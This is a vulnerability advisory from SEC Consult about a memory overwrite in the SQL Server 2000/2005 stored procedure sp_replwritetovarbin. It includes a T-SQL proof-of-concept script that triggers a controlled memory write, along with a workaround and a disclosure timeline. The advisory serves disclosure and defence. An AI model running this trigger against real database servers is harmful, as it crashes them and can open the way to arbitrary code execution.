Microsoft SQL Server sp_replwritetovarbin

SEC Consult Security Advisory < 20081209-0 >


title: Microsoft SQL Server sp_replwritetovarbin

limited memory overwrite vulnerability

program: Microsoft SQL Server 2000

Microsoft SQL Server 2005

vulnerable version: SQL Server 2000 (current version, tested on 8.00.2039)

SQL Server 2005 (current version, tested on 9.00.1399.06)

found: 04-12-2008

by: Bernhard Mueller (SEC Consult Vulnerability Lab)

perm. link:



Product description:



Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase.



Vulnerabilty overview:



By calling the extended stored procedure sp_replwritetovarbin, and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it is / may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL server process.

In a default configuration, the sp_replwritetovarbin stored procedure is accessible by anyone. The vulnerability can be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application.

This vulnerability has been confirmed on SQL Server 2000/2005 (SQL Server 2008 has not been tested).



Vulnerability details:



The following T-SQL script can be used to test for the vulnerability:


@val NVARCHAR(4), 
@counter INT

SET @buf = '
declare @retcode int, 
@end_offset int, 
@vb_buffer varbinary,
@vb_bufferlen int, 
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1, 
  @end_offset output, 
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
  SET @counter = @counter + 1
  SET @buf = @buf + @val

SET @buf = @buf + ''',''1'',''1'',''1'',

EXEC master..sp_executesql @buf



This triggers an access violation exception (write to address 0x41414141).

The vulnerability has been successfully used to execute arbitrary code on a lab machine.

SEC Consult will not release code execution exploits for this vulnerability to the public.






Remove the sp_replwriterovarbin extended stored procedure. Run the following as an administrator:


execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'


See also:


"Removing an Extended Stored Procedure from SQL Server"






According to an email received by Microsoft in September, a fix for this vulnerability has been completed.

The release schedule for this fix is currently unknown.



Vendor timeline:


Vendor notified: 2008-04-17

Vendor response: 2008-04-17

Last response from Microsoft: 09-29-2008

Request for update status 1: 10-14-2008

Request for update status 2: 10-29-2008

Request for update status 3: 11-12-2008

Request for update status 4

and prenotification about advisory release date: 11-28-2008

Public release: 12-09-2008

Update (added SQL Server 2005, thanks Moreno Zilli): 12-10-2008



SEC Consult Unternehmensberatung GmbH


Office Vienna

Mooslackengasse 17

A-1190 Vienna



Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com


EOF Bernhard Mueller / @2008